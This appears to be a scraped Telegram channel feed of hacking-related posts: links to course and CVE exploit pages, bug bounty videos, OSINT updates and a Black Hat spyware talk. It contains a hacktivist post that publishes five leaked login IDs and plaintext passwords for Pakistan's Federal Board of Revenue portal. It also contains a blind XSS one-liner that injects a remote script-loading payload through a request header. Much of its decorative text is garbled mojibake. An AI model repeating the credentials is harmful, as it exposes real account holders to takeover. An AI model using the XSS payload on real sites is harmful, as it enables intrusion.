https://system32.in/product/windows-process-injection-for-red-blue-teams/
Windows Process Injection for Red-Blue Teams BY PentesterAcademy
Forwarded from Cybertix
๐ข๐ฆ ๐๐ผ๐บ๐บ๐ฎ๐ป๐ฑ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ถ๐ป ๐๐ถ๐๐น๐ฎ๐ฏ๐ฑ
They have just ran a Gitlab Runner and passed out the OS Command which has executed Windows Calculator, in Windows OS Image.
๐ฝ๐ค๐ช๐ฃ๐ฉ๐ฎ : 6500$
๐๐ถ๐ป๐ธ: https://youtu.be/cDp-BTdhH0k?si=kLIoy_SKRL2T9MrS
They have just ran a Gitlab Runner and passed out the OS Command which has executed Windows Calculator, in Windows OS Image.
๐ฝ๐ค๐ช๐ฃ๐ฉ๐ฎ : 6500$
๐๐ถ๐ป๐ธ: https://youtu.be/cDp-BTdhH0k?si=kLIoy_SKRL2T9MrS
YouTube
GitLab Runner on Windows Host container OS Command Injection | Got Bounty of $6500 ๐ฑ #technology #ai
๐๐๐๐๐๐๐๐ค๐๐ ๐๐๐ฅ๐๐ง๐:
https://hackerone.com/reports/955016
๐๐ฑ๐ค๐๐ฃ ๐ค๐๐ง ๐ช๐ค๐๐ข๐๐ฃ๐๐ฉ๐ :
๐ด๐๐๐๐๐จ๐๐ฅ๐: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
๐ด๐๐๐ก๐๐๐๐๐
https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข : https://www.instagram.com/thecybertix/
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง:โฆ
https://hackerone.com/reports/955016
๐๐ฑ๐ค๐๐ฃ ๐ค๐๐ง ๐ช๐ค๐๐ข๐๐ฃ๐๐ฉ๐ :
๐ด๐๐๐๐๐จ๐๐ฅ๐: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
๐ด๐๐๐ก๐๐๐๐๐
https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข : https://www.instagram.com/thecybertix/
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง:โฆ
๐ฟ2
https://system32.ink/issabel-pbx-4.0.0-rce-authenticated-cve-2024-0986-exploit/
Issabel PBX 4.0.0 RCE โ Authenticated (CVE-2024-0986) Exploit
Forwarded from OSINT AMBITION (Dheeraj Yadav)
The Wednesday Updates #3(2024) is out now.
https://osintambition.substack.com/p/the-wednesday-updates-658
Don't forget to subscribe.
#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate #infosec
https://osintambition.substack.com/p/the-wednesday-updates-658
Don't forget to subscribe.
#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate #infosec
Osintupdates
The Wednesday Updates #3(2024)
A hub for all weekly updates from OSINT community at single place.
๐2
https://system32.in/product/become-a-soc-analyst-level-2-cybrary/
Become a SOC Analyst - Level 2 [Cybrary]
Forwarded from K I N G S M A N ๐ฎ๐ณ (๐ผ๐๐๐ฃ๐ฉ ๐ผ๐จ๐๐ค๐ฉ)
๐ฐPakistan ๐ต๐ฐ Federal Board of Revenue Credential Leaked By K I N G S M A N ๐ฎ๐ณ ๐ฐ
Threat Actor : K I N G S M A N ๐ฎ๐ณ
Type : Government
SPL MSG :Focus on Economics of your country and do not support Terrorism ๐
https://iris.fbr.gov.pk 4420689545809:Hamza@59
https://iris.fbr.gov.pk 3530164934712:d73yzpr5oh
https://iris.fbr.gov.pk 3110575024055:Iru#123*
https://iris.fbr.gov.pk 3520296235408:4263BEC2
https://iris.fbr.gov.pk 3530108287975:4upinbpx3x
JAI HIND ๐ฎ๐ณ
JAI SHREE RAM ๐ฉ
@KINGSMAN_INDIA
Threat Actor : K I N G S M A N ๐ฎ๐ณ
Type : Government
SPL MSG :
https://iris.fbr.gov.pk 4420689545809:Hamza@59
https://iris.fbr.gov.pk 3530164934712:d73yzpr5oh
https://iris.fbr.gov.pk 3110575024055:Iru#123*
https://iris.fbr.gov.pk 3520296235408:4263BEC2
https://iris.fbr.gov.pk 3530108287975:4upinbpx3x
#All_Indian_Hackers
#KINGSMAN
JAI HIND ๐ฎ๐ณ
JAI SHREE RAM ๐ฉ
@KINGSMAN_INDIA
โค4๐3๐1
Forwarded from Cybertix
๐๐น๐ถ๐ป๐ฑ ๐ซ๐ฆ๐ฆ ๐ถ๐ป ๐ซ-๐๐ผ๐ฟ๐๐ฎ๐ฟ๐ฑ๐ฒ๐ฑ-๐๐ผ๐๐ ๐๐ฒ๐ฎ๐ฑ๐ฒ๐ฟ
๐ข๐ป๐ฒ๐น๐ถ๐ป๐ฒ๐ฟ ๐๐ถ๐ป๐ธ๐๐ป
https://twitter.com/thecybertix/status/1781206342952464543?t=U6j7zOdxTrqQPrHJyzOpUg&s=19
๐ข๐ป๐ฒ๐น๐ถ๐ป๐ฒ๐ฟ ๐๐ถ๐ป๐ธ๐๐ป
https://twitter.com/thecybertix/status/1781206342952464543?t=U6j7zOdxTrqQPrHJyzOpUg&s=19
X (formerly Twitter)
Cybertix (@thecybertix) on X
๐๐น๐ถ๐ป๐ฑ ๐ซ๐ฆ๐ฆ ๐ถ๐ป ๐ซ-๐๐ผ๐ฟ๐๐ฎ๐ฟ๐ฑ๐ฒ๐ฑ-๐๐ผ๐๐ ๐๐ฒ๐ฎ๐ฑ๐ฒ๐ฟ
findomain -t https://t.co/4XrLvdFCfL | gau | bxss -payload '"><script src=https://t.co/XNpH7dI1eE></script>' -header "X-Forwarded-For"
Access Oneliners from Github:
https://t.co/Lv5AeEDSFl
#bugbountytips #hacks
findomain -t https://t.co/4XrLvdFCfL | gau | bxss -payload '"><script src=https://t.co/XNpH7dI1eE></script>' -header "X-Forwarded-For"
Access Oneliners from Github:
https://t.co/Lv5AeEDSFl
#bugbountytips #hacks
โค1
https://system32.in/product/red-team-operator-malware-development-intermediate-course-sektor7/
RED TEAM Operator: Malware Development Intermediate Course [Sektor7]
โคโ๐ฅ5
https://system32.in/topic/free-programming-and-data-analytics-resources/
Free Programming And Data Analytics Resources
โคโ๐ฅ2โค1
https://system32.in/product/assessing-and-exploiting-control-system-and-iiot-blackhat/
ASSESSING AND EXPLOITING CONTROL SYSTEM AND IIOT #blackhat
Forwarded from Cybertix
๐๐๐๐ผ๐บ๐ฎ๐๐ถ๐ป๐ด ๐๐น๐ถ๐ป๐ฑ ๐ซ๐ฆ๐ฆ ๐ผ๐ป ๐๐ฒ๐ฎ๐ฑ๐ฒ๐ฟ ๐ฏ๐ฎ๐๐ฒ๐ฑ ๐๐ฅ
๐๐ถ๐ป๐ธ: https://youtu.be/KgEwfY3ZENE?si=TXMCAD1cBs7Ghwtk
๐ฃ๐น๐ฒ๐ฎ๐๐ฒ ๐ฑ๐ผ ๐น๐ถ๐ธ๐ฒ & ๐ฆ๐๐ฏ๐๐ฐ๐ฟ๐ถ๐ฏ๐ฒ ๐๐ผ ๐ผ๐๐ฟ ๐ฌ๐ผ๐๐ง๐๐ฏ๐ฒ ๐ฐ๐ต๐ฎ๐ป๐ป๐ฒ๐น๐๐ป
๐๐ถ๐ป๐ธ: https://youtu.be/KgEwfY3ZENE?si=TXMCAD1cBs7Ghwtk
๐ฃ๐น๐ฒ๐ฎ๐๐ฒ ๐ฑ๐ผ ๐น๐ถ๐ธ๐ฒ & ๐ฆ๐๐ฏ๐๐ฐ๐ฟ๐ถ๐ฏ๐ฒ ๐๐ผ ๐ผ๐๐ฟ ๐ฌ๐ผ๐๐ง๐๐ฏ๐ฒ ๐ฐ๐ต๐ฎ๐ป๐ป๐ฒ๐น๐๐ป
YouTube
Automating Blind XSS ๐ #bugbounty #bugbountytips #cybersecurity #ai #technology #india #bug #hacker
๐๐
๐๐๐ ๐ป๐ง๐๐๐๐๐๐๐:
https://tryhackme.com/signup?referrer=60fe467cd3ab6f004ac8b758
๐๐ฑ๐ค๐๐ฃ ๐ค๐๐ง ๐ช๐ค๐๐ข๐๐ฃ๐๐ฉ๐ :
๐ด๐๐๐๐๐จ๐๐ฅ๐: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
๐ด๐๐๐ก๐๐๐๐๐
https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข : https://www.instaโฆ
https://tryhackme.com/signup?referrer=60fe467cd3ab6f004ac8b758
๐๐ฑ๐ค๐๐ฃ ๐ค๐๐ง ๐ช๐ค๐๐ข๐๐ฃ๐๐ฉ๐ :
๐ด๐๐๐๐๐จ๐๐ฅ๐: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
๐ด๐๐๐ก๐๐๐๐๐
https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข : https://www.instaโฆ
Forwarded from Android Security & Malware
[BlackHat Asia 2024] Analysing a NSO iOS Spyware Sample
https://www.blackhat.com/asia-24/briefings/schedule/?s=03#you-shall-not-pass---analysing-a-nso-ios-spyware-sample-37980
[slides] https://i.blackhat.com/Asia-24/Asia-24-Frielingsdorf-YouShallNotPassAnalysing.pdf
https://www.blackhat.com/asia-24/briefings/schedule/?s=03#you-shall-not-pass---analysing-a-nso-ios-spyware-sample-37980
[slides] https://i.blackhat.com/Asia-24/Asia-24-Frielingsdorf-YouShallNotPassAnalysing.pdf
Blackhat
Black Hat Asia 2024
https://system32.ink/ciscos-cimc-command-injection-cve-2024-20356-exploit/
Cisco's CIMC Command Injection CVE-2024-20356 Exploit
https://system32.ink/oracle-virtualbox-local-privilege-escalation-cve-2024-21111-exploit/
Oracle VirtualBox Local Privilege Escalation CVE-2024-21111 Exploit